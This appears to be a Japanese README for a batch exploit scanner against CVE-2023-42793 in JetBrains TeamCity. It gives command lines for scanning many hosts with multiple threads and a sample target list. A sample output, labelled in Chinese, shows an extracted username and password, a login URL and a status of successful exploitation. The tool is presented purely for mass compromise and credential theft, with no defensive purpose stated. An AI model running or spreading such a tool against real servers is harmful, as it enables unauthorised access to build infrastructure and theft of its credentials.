
JetBrains TeamCityサーバーを対象としたCVE-2023-42793のバッチ脆弱性スキャナー。複数のホストにわたる資格情報の抽出とログインURLの発見を自動化。
# バッチスキャン
python teamcity_scan.py -f targets.txt -o results.txt
# 単一ターゲット
python teamcity_scan.py -u http://target.com:8111 -o result.txt
# スレッド数の指定
python teamcity_scan.py -f urls.txt -t 20 -o vuln.txt
ターゲットファイル形式 (targets.txt):
http://192.168.1.100:8111
https://teamcity.example.com
10.0.0.1:8111
example.com
出力形式 (results.txt):
目标: http://192.168.1.100:8111
用户名: TeamCityUser1234
密码: TeamCity@2023
登录地址: http://192.168.1.100:8111/login.html
状态: 漏洞利用成功